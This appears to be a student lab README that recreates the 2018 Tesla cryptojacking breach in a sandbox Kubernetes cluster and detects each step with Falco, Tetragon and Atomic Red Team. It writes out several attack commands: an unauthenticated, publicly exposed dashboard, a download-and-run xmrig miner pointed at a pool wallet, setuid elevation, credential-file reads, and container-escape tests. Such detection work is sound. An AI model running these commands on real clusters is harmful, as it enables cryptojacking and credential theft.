2018 Tesla Data Breach

As part of this task, I was required to map the 2018 Tesla data breach to the MITRE ATT&CK framework, select any two specific techniques from the incident, and replicate both on a proof-of-concept basis. Doing so demonstrates my understanding by synthesizing the selected techniques, and both techniques are documented in this repo.

Architectural Diagram

Link to Google Diagram

Falco Detections aligned with MITRE ATT&CK Framework

| Falco Detection Rule | Description | Event Source | MITRE ATT&CK Tactic |
| --- | --- | --- | --- |
| Terminal Shell in Container | A shell was used as the entrypoint/exec point into a container with an attached terminal. | Host System Calls | Execution |
| Detect crypto miners using the Stratum protocol | Miners typically specify the mining pool to connect to with a URI that begins with stratum+tcp. | Host System Calls | Execution, Command & Control |
| Detect outbound connections to common miner pool ports | Miners typically connect to mining pools on common ports. | Host System Calls | Execution, Command & Control |
| Mining Binary Detected | Malicious script or binary detected within a pod or host. This rule is triggered by the execve syscall. | Host System Calls | Persistence |
| List AWS S3 Buckets | Detects listing of all S3 buckets. In the case of Tesla, those buckets contained sensitive data such as passwords, tokens and telemetry data. | AWS CloudTrail Audit Logs | Credential Access |
| Contact EC2 Instance Metadata Service From Container | Detects attempts to contact the EC2 instance metadata service from within a container, which can expose the IAM credentials used to pivot into the cloud account. | Host System Calls | Lateral Movement |

Setting up the Sandbox

I had to set up an AWS CLI profile in order to interact with AWS services from my local workstation:

aws configure --profile nigel-aws-profile
export AWS_PROFILE=nigel-aws-profile                                            
aws sts get-caller-identity --profile nigel-aws-profile
aws eks update-kubeconfig --region eu-west-1 --name tesla-cluster

Screenshot 2023-10-20 at 17 04 05

Once I had the AWS CLI installed, I created a one-node AWS EKS cluster using the eksctl CLI tool.
Notice how I use the date command purely to confirm when those actions were performed.

date
eksctl create cluster tesla-cluster --node-type t3.xlarge --nodes=1 --nodes-min=0 --nodes-max=3 --max-pods-per-node 58

Screenshot 2023-10-20 at 17 08 09

Once the cluster is successfully spun up, I can scale it down to zero nodes to bring my cloud compute costs down to $0 until I'm ready to do actual work.

date
eksctl get cluster
eksctl get nodegroup --cluster tesla-cluster
eksctl scale nodegroup --cluster tesla-cluster --name ng-64004793 --nodes 0
Screenshot 2023-10-29 at 12 02 04
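When I'm ready to resume work, the same scale command brings the node group back up (the node-group name comes from the eksctl get nodegroup output above):

# Scale the node group back to one node when resuming work
eksctl scale nodegroup --cluster tesla-cluster --name ng-64004793 --nodes 1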

Exposing an insecure Kubernetes Dashboard

Kubernetes Dashboard is a general purpose, web-based UI for Kubernetes clusters.
It allows users to manage applications running in the cluster and troubleshoot them, as well as manage the cluster itself.

When Kubernetes dashboard is installed using the recommended settings, both authentication and HTTPS are enabled. Sometimes, organizations like Tesla choose to disable authentication or HTTPS.

For example, if Kubernetes dashboard is served behind a proxy, then it's unnecessary to enable authentication when the proxy has its own authentication enabled.

Kubernetes Dashboard uses auto-generated certificates for HTTPS, which may cause problems for HTTP clients.
The YAML manifest below is pre-packaged to provide an insecure dashboard with both authentication and HTTPS disabled.

kubectl apply -f https://vividcode.io/content/insecure-kubernetes-dashboard.yml

Still experiencing issues exposing the dashboard via port forwarding:

kubectl port-forward svc/kubernetes-dashboard -n kubernetes-dashboard 8443 --insecure-skip-tls-verify

The above manifest is a modified version of the deployment of Kubernetes dashboard which has removed the argument --auto-generate-certificates and has added some extra arguments:

--enable-skip-login
--disable-settings-authorizer
--enable-insecure-login
--insecure-bind-address=0.0.0.0

Screenshot 2023-10-21 at 12 41 45
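To sanity-check that those arguments actually landed on the Deployment, a standard kubectl query like the one below should do (the jsonpath expression is mine, and it assumes the Deployment keeps the upstream name kubernetes-dashboard):

# Print the container args on the kubernetes-dashboard Deployment
kubectl -n kubernetes-dashboard get deployment kubernetes-dashboard \
  -o jsonpath='{.spec.template.spec.containers[0].args}'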

After this change, the Kubernetes Dashboard server starts on port 9090 for HTTP. The manifest also modifies the livenessProbe to use HTTP as the scheme and 9090 as the port.

Accessing the Kubernetes Dashboard

This proxy command starts a proxy to the Kubernetes API server, and the dashboard should be accessible at
http://localhost:8001/api/v1/namespaces/kubernetes-dashboard/services/https:kubernetes-dashboard:/proxy/.
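The proxy in question is just the stock kubectl proxy, which listens on 127.0.0.1:8001 by default:

# Start a local proxy to the Kubernetes API server on port 8001
kubectl proxy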

Screenshot 2023-10-21 at 12 49 34

However, I received the below error at proxy address:
"message": "no endpoints available for service \"https:kubernetes-dashboard:\""

Screenshot 2023-10-21 at 12 48 29
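A quick check of whether the Service actually has ready backends helps narrow down this "no endpoints available" error; this is plain kubectl, nothing specific to this setup:

# If the ENDPOINTS column is empty, the dashboard pods are not ready or the selector doesn't match
kubectl -n kubernetes-dashboard get svc,endpoints,pods -o wide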

Troubleshooting the Dashboard Issues

Port 9090 is added as the containerPort. Similarly, the Kubernetes Service abstraction for the dashboard opens port 80 and uses 9090 as the target port. Accessing the dashboard at http://localhost:8001/ shows all associated API paths, and it's quite easy to harvest credentials from these paths:

Screenshot 2023-10-21 at 12 58 57

We can even see the underlying EC2 instance associated with the Kubernetes cluster. eu-west-1 denotes the AWS region (Ireland) where I've installed the EC2 instance, and the IP address of the VM is also present in the name:

Screenshot 2023-10-21 at 13 02 09

The IP address in the previous OIDC screenshot does not match the private IP of my EC2 instance on AWS.
I will come back to this later to understand how that OIDC address is used for single sign-on:

Screenshot 2023-10-21 at 13 07 53

Either way, I modified the original deployment manifest to make sure the Kubernetes Dashboard is exposed via a LoadBalancer Service.
This way, AWS automatically assigns a public address to the dashboard service, allowing it to be accessed publicly:

kubectl apply -f https://raw.githubusercontent.com/nigeldouglas-itcarlow/2018-Tesla-Data-Breach/main/public-dashboard.yaml
Screenshot 2023-10-21 at 13 23 54
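Once the LoadBalancer Service is up, AWS publishes its external hostname on the Service status; a jsonpath lookup along these lines retrieves it (assuming the Service keeps the kubernetes-dashboard name):

# Fetch the external hostname assigned by the AWS load balancer
kubectl -n kubernetes-dashboard get svc kubernetes-dashboard \
  -o jsonpath='{.status.loadBalancer.ingress[0].hostname}'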

Proof that the L7 load balancer service was created in AWS automatically.
However, there seem to be some health issues preventing me from accessing the dashboard.

Screenshot 2023-10-21 at 13 36 52

After you have done this, when Kubernetes dashboard is opened, you can click Skip in the login page to skip authentication and go to the dashboard directly.

kubernetes_dashboard_skip

Supporting documentation for Kubernetes Dashboard without Authentication

Installing Falco as our SOC solution

I installed Falco via Helm using the --set tty=true flag to ensure events are handled in real time.
By default, only the stable rules are loaded by Falco; you can install the sandbox or incubating rules by referencing them in the Helm chart:
https://falco.org/docs/reference/rules/default-rules/

Remove the existing Falco installation with stable rules:

helm uninstall falco -n falco

Install Falco again with the modified falco-sandbox_rules.yaml referenced from my own Github repository: https://github.com/nigeldouglas-itcarlow/2018-Tesla-Data-Breach/blob/main/rules/falco-sandbox_rules.yaml


I'm enabling the `incubating` and `sandbox` rules for the purpose of this assignment:
helm install falco -f mitre_rules.yaml falcosecurity/falco --namespace falco \
  --create-namespace \
  --set tty=true \
  --set auditLog.enabled=true \
  --set falcosidekick.enabled=true \
  --set falcosidekick.webui.enabled=true \
  --set collectors.kubernetes.enabled=true \
  --set falcosidekick.webui.redis.storageEnabled=false \
  --set "falcoctl.config.artifact.install.refs={falco-incubating-rules:2,falco-sandbox-rules:2}" \
  --set "falcoctl.config.artifact.follow.refs={falco-incubating-rules:2,falco-sandbox-rules:2}" \
  --set "falco.rules_file={/etc/falco/falco-incubating_rules.yaml,/etc/falco/falco-sandbox_rules.yaml}"
kubectl get pods -n falco -o wide
Screenshot 2023-11-03 at 16 47 25
Where:
- falcoctl.config.artifact.install.refs governs which rules are downloaded at startup,
- falcoctl.config.artifact.follow.refs identifies which rules are automatically updated, and
- falco.rules_file indicates which rules are loaded by the engine.
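To confirm falcoctl actually pulled the extra rule files, listing /etc/falco inside a Falco pod is a reasonable spot-check (the ds/falco shorthand assumes the chart's default DaemonSet name):

# The incubating and sandbox rule files should appear alongside falco_rules.yaml
kubectl exec -n falco -c falco ds/falco -- ls /etc/falco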

Alternatively, I can just edit the ConfigMap manually (and this might be easier in the end):

kubectl edit cm falco-rules -n falco

I can inject Custom Rules via the working-rules.yaml manifest: Screenshot 2023-10-29 at 11 42 58

I successfully deployed Falco and the associated dashboard.
As seen in the screenshot below, the pods may go through some crash/restart status changes before running correctly (expected, since no priority class is set):

Screenshot 2023-10-27 at 11 43 33

Finally, port-forward the Falco Sidekick UI from my MacBook:

kubectl port-forward svc/falco-falcosidekick-ui -n falco 2802 --insecure-skip-tls-verify

Forwarding from 127.0.0.1:2802 -> 2802
Forwarding from [::1]:2802 -> 2802
Handling connection for 2802

Screenshot 2023-10-27 at 11 56 17

Deploying a Test App and Checking Logs

Create an insecure containerized workload with privileged=true to give unrestricted permissions for the miner:

kubectl apply -f https://raw.githubusercontent.com/nigeldouglas-itcarlow/2018-Tesla-Data-Breach/main/tesla-app.yaml
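For context, a privileged pod of roughly this shape is what tesla-app.yaml provides; the sketch below is illustrative only, and the actual manifest in the repo may differ in image and other details:

# Illustrative sketch of a privileged pod similar in spirit to tesla-app.yaml
kubectl apply -f - <<EOF
apiVersion: v1
kind: Pod
metadata:
  name: tesla-app
spec:
  containers:
  - name: tesla-app
    image: centos:7            # assumption: a CentOS-based image, since yum is used later
    command: ["sleep", "infinity"]
    securityContext:
      privileged: true         # unrestricted permissions for the miner, as described above
EOF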

Shell into the newly created, over-privileged workload:

kubectl exec -it tesla-app -- bash
Screenshot 2023-10-27 at 12 02 09

To test the IDS/SOC tool, I perform one insecure behaviour in tab 1 while also checking for the Falco log event in tab 2:

kubectl logs -f --tail=0 -n falco -c falco -l app.kubernetes.io/name=falco | grep 'tesla-app'
Screenshot 2023-10-22 at 13 54 45

If you look at the above screenshot, I created a new workload called tesla-app, terminal-shelled into the workload, and have a real-time live tail of security events showing in the second terminal window, proving the IDS works.

Supporting documentation for Falco event collection from Kubernetes and Cloud

Enabling Kubernetes Audit Logs in Falco

To enable Kubernetes audit logs, you need to change the arguments to the kube-apiserver process to add --audit-policy-file and --audit-webhook-config-file arguments and provide files that implement an audit policy/webhook configuration.

The step-by-step guide below shows how to configure Kubernetes audit logs on minikube and deploy Falco.
Managed Kubernetes providers, like AWS EKS, usually provide their own mechanism to configure the audit system.
https://falco.org/docs/install-operate/third-party/learning/
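On EKS specifically, the kube-apiserver flags aren't directly editable; control-plane audit logging is instead toggled through eksctl. Something along these lines should enable it (treat the exact flags as an assumption to verify against the eksctl docs):

# Enable control-plane audit logs for the EKS cluster
eksctl utils update-cluster-logging --cluster tesla-cluster --region eu-west-1 \
  --enable-types audit --approve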

Running a Cryptominer on an insecure workload

kubectl apply -f https://raw.githubusercontent.com/nigeldouglas-itcarlow/2018-Tesla-Data-Breach/main/tesla-app.yaml

The adversaries would have terminal shelled into the above workload in order to install the cryptominer.

kubectl exec -it tesla-app -- bash

Download the xmrig mining package from the official Github project:

curl -OL https://github.com/xmrig/xmrig/releases/download/v6.16.4/xmrig-6.16.4-linux-static-x64.tar.gz

Unzipping the mining binary package

tar -xvf xmrig-6.16.4-linux-static-x64.tar.gz

Changing directory to the newly-downloaded miner folder

cd xmrig-6.16.4

Elevate permissions by setting the setuid bit on the binary, then list setuid/setgid files:

chmod u+s xmrig
find / -perm /6000 -type f

Tested - and works!

./xmrig --donate-level 8 -o xmr-us-east1.nanopool.org:14433 -u 422skia35WvF9mVq9Z9oCMRtoEunYQ5kHPvRqpH1rGCv1BzD5dUY4cD8wiCMp4KQEYLAN1BuawbUEJE99SNrTv9N9gf2TWC --tls --coin monero
Screenshot 2023-10-27 at 12 05 51

On the right side pane, we can see that all rules are automatically labelled with relevant MITRE ATT&CK context:

Screenshot 2023-10-27 at 12 06 03

After enabling the mining ports and pools rule within my mitre_rules.yaml file, I can see the new domain detection for mining pool:

Screenshot 2023-11-17 at 11 50 08

Testing my own MetaMask wallet using the stratum protocol outlined by the Trend Micro researchers:

./xmrig -o stratum+tcp://xmr.pool.minergate.com:45700 -u lies@lies.lies -p x -t 2
Screenshot 2023-10-31 at 19 53 07

Some rules are specifically disabled within the sandbox manifest file, so we need to enable these separately

Screenshot 2023-10-31 at 20 03 19

Maturity rules are coming through, but I need to make some changes either to the ConfigMap or within the custom rules config file:

Screenshot 2023-11-01 at 11 28 04

Custom Rules - Command & Control

Check whether the xmrig process is still running:

top

If so, find the Process ID of the xmrig service:

pidof xmrig

You can now kill the process either by process name or by process ID:

killall -9 xmrig
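Equivalently, the process can be killed by PID using the pidof output from above:

# Kill the miner by PID rather than by name
kill -9 "$(pidof xmrig)"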

Nanominer Test Scenario

wget https://github.com/nanopool/nanominer/releases/download/v1.4.0/nanominer-linux-1.4.0.tar.gz
tar -xvzf ./nanominer-linux-1.4.0.tar.gz
cd nanominer-linux-1.4.0/ 
nano config.ini
./nanominer -d

Credential Access

Finding credentials while we are in the container:

cat /etc/shadow > /dev/null
find /root -name "id_rsa"
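As with the earlier shell test, these reads should surface in the Falco tail; filtering on the pod name keeps it simple, since the exact rule names in the output depend on which rule set is loaded:

# Watch the Falco stream for sensitive-file and private-key detections against tesla-app
kubectl logs -f --tail=0 -n falco -c falco -l app.kubernetes.io/name=falco | grep 'tesla-app'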

Obfuscating Activity

This is where an attacker would use a Base64-encoded script to evade traditional file-based detection systems.
Shell into the newly-deployed atomic-red workload:

kubectl exec -it -n atomic-red deploy/atomicred -- bash

Confirm the atomic red scenario was detected (in a second terminal window):

kubectl logs -f --tail=0 -n falco -c falco -l app.kubernetes.io/name=falco | grep 'Bulk data has been removed from disk'

Detect File Deletion on Host (T1070.004)

Adversaries may delete files left behind by the actions of their intrusion activity.
Start a Powershell session with pwsh:

pwsh

Atomic Red Team tests are all performed via PowerShell,
so it might look a bit odd that I shell into a Linux container in order to run pwsh commands.

Screenshot 2023-10-29 at 11 55 01

Load the Atomic Red Team module:

Import-Module "~/AtomicRedTeam/invoke-atomicredteam/Invoke-AtomicRedTeam.psd1" -Force

Check the details of the TTPs:

Invoke-AtomicTest T1070.004 -ShowDetails

Check the prerequisites to ensure the test conditions are right:

Invoke-AtomicTest T1070.004 -GetPreReqs

We will now execute the test.
This test will attempt to delete individual files or individual directories.
This triggers the 'Bulk data has been removed from disk' warning rule by default.

Invoke-AtomicTest T1070.004

I successfully detected file deletion in the Kubernetes environment:

Screenshot 2023-10-29 at 11 58 42

Escape to Host (T1611)

Adversaries may break out of a container to gain access to the underlying host.
This can allow an adversary access to other containerised resources from the host-level.

kubectl logs -f --tail=0 -n falco -c falco -l app.kubernetes.io/name=falco | grep 'Network tool launched in container'
Invoke-AtomicTest T1611

Boot or Logon Initialisation Scripts (T1037.004)

Adversaries can establish persistence by modifying RC scripts which are executed during system startup

kubectl logs -f --tail=0 -n falco -c falco -l app.kubernetes.io/name=falco | grep 'Potentially malicious Python script'
Invoke-AtomicTest T1037.004

The new detection totally worked. Hurrah!! Screenshot 2023-10-30 at 18 27 15

When you’re ready to move on to the next test or wrap things up, you’ll want to -CleanUp the test to avoid potentially having problems running other tests.

Invoke-AtomicTest T1037.004 -CleanUp

Launch a suspicious network tool in a container

Shell into the same container we used earlier

kubectl exec -it tesla-app -- bash

Installing a suspicious networking tool like telnet

yum install telnet telnet-server -y

If this fails, just apply a few modifications to the yum repository configuration:

cd /etc/yum.repos.d/
sed -i 's/mirrorlist/#mirrorlist/g' /etc/yum.repos.d/CentOS-*
sed -i 's|#baseurl=http://mirror.centos.org|baseurl=http://vault.centos.org|g' /etc/yum.repos.d/CentOS-*

Run a yum update with the new repository configuration:

yum update -y

Now, try to install telnet and the telnet server from the package manager:

yum install telnet telnet-server -y

Just to generate the detection, run telnet:

telnet
Screenshot 2023-11-14 at 21 16 33 Screenshot 2023-11-14 at 21 16 56 Screenshot 2023-11-14 at 21 15 59

Let's also test tcpdump to prove the macro is working:

yum install tcpdump -y
tcpdump -D
tcpdump --version
tcpdump -nnSX port 443

Exfiltrating Artifacts via the Kubernetes Control Plane

Copy files from a pod to the local system.
In this case, I copy the xmrig tarball that was downloaded into the tesla-app pod back to my local desktop.
Run the following command:

kubectl cp tesla-app:xmrig-6.16.4-linux-static-x64.tar.gz ~/desktop/xmrig-6.16.4-linux-static-x64.tar.gz
Screenshot 2023-11-01 at 11 33 23

T1552.001 - Unsecured Credentials: Credentials In Files

We can use Atomic Red Team to find AWS credentials in order to move laterally to the cloud: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md#atomic-test-1---find-aws-credentials

Invoke-AtomicTest T1552.001 -ShowDetails
Screenshot 2023-11-13 at 21 27 36

Cleanup Helm Deployments

helm uninstall falco -n falco
Screenshot 2023-10-27 at 14 43 45

AWS Profile Stuff

aws configure --profile nigel-aws-profile
export AWS_PROFILE=nigel-aws-profile                                            
aws sts get-caller-identity --profile nigel-aws-profile
aws eks update-kubeconfig --region eu-west-1 --name tesla-cluster
Screenshot 2023-10-22 at 19 53 37

Confirming the detection rules are present in the current, up-to-date rules feed:
https://thomas.labarussias.fr/falco-rules-explorer/?source=okta

Exposing Falco Sidekick from my EC2 instance:

sudo ssh -i "falco-okta.pem" -L 2802:localhost:2802 ubuntu@ec2-**-***-**-***.eu-west-1.compute.amazonaws.com

Accessing the Sidekick UI via Localhost

http://localhost:2802/events/?since=15min&filter=mitre

Running Atomic Red Team in Kubernetes

Create the Kubernetes namespace for the atomic red workload:

kubectl create ns atomic-red

Create the deployment using an external image issif/atomic-red:latest

kubectl apply -f - <<EOF
apiVersion: apps/v1
kind: Deployment
metadata:
  name: atomicred
  namespace: atomic-red
  labels:
    app: atomicred
spec:
  replicas: 1
  selector:
    matchLabels:
      app: atomicred
  template:
    metadata:
      labels:
        app: atomicred
    spec:
      containers:
      - name: atomicred
        image: issif/atomic-red:latest
        imagePullPolicy: "IfNotPresent"
        command: ["sleep", "3560d"]
        securityContext:
          privileged: true
      nodeSelector:
        kubernetes.io/os: linux
EOF

Note: This creates a pod called atomicred in the atomic-red namespace:

kubectl get pods -n atomic-red -w | grep atomicred

I successfully deployed the atomic-red container to my environment: Screenshot 2023-10-29 at 11 50 08

Use Vim to create our custom rules:

vi mitre_rules.yaml
customRules:
  mitre_rules.yaml: |-
    - rule: Base64-encoded Python Script Execution
      desc: >
        This rule detects base64-encoded Python scripts on command line arguments.
        Base64 can be used to encode binary data for transfer to ASCII-only command
        lines. Attackers can leverage this technique in various exploits to load
        shellcode and evade detection.
      condition: >
        spawned_process and (
          ((proc.cmdline contains "python -c" or proc.cmdline contains "python3 -c" or proc.cmdline contains "python2 -c") and
          (proc.cmdline contains "echo" or proc.cmdline icontains "base64"))
          or
          ((proc.cmdline contains "import" and proc.cmdline contains "base64" and proc.cmdline contains "decode"))
        )
      output: >
        Potentially malicious Python script encoded on command line
        (proc.cmdline=%proc.cmdline user.name=%user.name proc.name=%proc.name
        proc.pname=%proc.pname evt.type=%evt.type gparent=%proc.aname[2]
        ggparent=%proc.aname[3] gggparent=%proc.aname[4] evt.res=%evt.res
        proc.pid=%proc.pid proc.cwd=%proc.cwd proc.ppid=%proc.ppid
        proc.pcmdline=%proc.pcmdline proc.sid=%proc.sid proc.exepath=%proc.exepath
        user.uid=%user.uid user.loginuid=%user.loginuid
        user.loginname=%user.loginname group.gid=%group.gid group.name=%group.name
        image=%container.image.repository:%container.image.tag
        container.id=%container.id container.name=%container.name file=%fd.name)
      priority: warning
      tags:
        - ATOMIC_RED_T1037.004
        - MITRE_TA0005_defense_evasion
        - MITRE_T1027_obfuscated_files_and_information
      source: syscall
      append: false
      exceptions:
        - name: proc_cmdlines
          comps:
            - startswith
          fields:
            - proc.cmdline

I'm lazy, so I uninstall and reinstall charts rather than upgrading:

helm uninstall falco -n falco

Alternative way of testing the new mitre_rules.yaml file:

helm install falco -f mitre_rules.yaml falcosecurity/falco --namespace falco \
  --create-namespace \
  --set tty=true \
  --set auditLog.enabled=true \
  --set falcosidekick.enabled=true \
  --set falcosidekick.webui.enabled=true \
  --set collectors.kubernetes.enabled=true \
  --set falcosidekick.webui.redis.storageEnabled=false

Let's delete the Falco pod to ensure the changes have been enforced.

kubectl delete pod -l app.kubernetes.io/name=falco -n falco

Note: A new pod will appear after several seconds. Please be patient.

kubectl get pods -n falco -w

Ongoing Issues

Issues with the environment (maximum number of VPCs was reached), disregard: Screenshot 2023-10-25 at 20 40 42

Deploying the Kubernetes dashboard via Helm

Add kubernetes-dashboard repository

helm repo add kubernetes-dashboard https://kubernetes.github.io/dashboard/

Deploy a Helm Release named kubernetes-dashboard using the kubernetes-dashboard chart

helm upgrade --install kubernetes-dashboard kubernetes-dashboard/kubernetes-dashboard --create-namespace --namespace kubernetes-dashboard
Screenshot 2023-11-03 at 11 39 14

Uninstall the Kubernetes Dashboard

helm uninstall kubernetes-dashboard -n kubernetes-dashboard
Screenshot 2023-11-18 at 23 47 28

Copying the kubeconfig file from its rightful location to my desktop:

cp ~/.kube/config ~/Desktop/

Install Tetragon

helm repo add cilium https://helm.cilium.io
helm repo update
helm install tetragon cilium/tetragon -n kube-system
kubectl rollout status -n kube-system ds/tetragon -w

Network traffic analysis using Tetragon

Create a TracingPolicy in Tetragon

kubectl apply -f https://raw.githubusercontent.com/cilium/tetragon/main/examples/tracingpolicy/tcp-connect.yaml

Tracing via Tetragon

Open an activity tail for Tetragon (Terminal 2):

kubectl logs -n kube-system -l app.kubernetes.io/name=tetragon -c export-stdout -f | tetra getevents -o compact --namespace default --pod tesla-app

Open an event output for Falco (Terminal 3):

kubectl logs --follow -n falco -l app.kubernetes.io/instance=falco | grep k8s.pod=tesla-app
Screenshot 2023-11-18 at 20 31 20

Kill the Miner Processes using Tetragon

Now we apply a Tetragon TracingPolicy that performs a sigkill action when the miner binary is run:

kubectl apply -f https://raw.githubusercontent.com/nigeldouglas-itcarlow/2018-Tesla-Data-Breach/main/sigkill-miner.yaml
Screenshot 2023-11-18 at 20 40 11

Custom Test Scenarios:

Base64 encoding, mining binaries and mining pools. They all work!! :)

helm install falco falcosecurity/falco \
  -n falco \
  --version 3.3.0 \
  --set falcosidekick.enabled=true \
  --set falcosidekick.webui.enabled=true \
  --set collectors.kubernetes.enabled=true \
  --set falcosidekick.webui.redis.storageEnabled=false \
  -f custom-rules.yaml

Deploy Kubernetes Dashboard:

kubectl apply -f https://raw.githubusercontent.com/nigeldouglas-itcarlow/2018-Tesla-Data-Breach/main/public-dashboard.yaml
Screenshot 2023-11-18 at 23 59 08
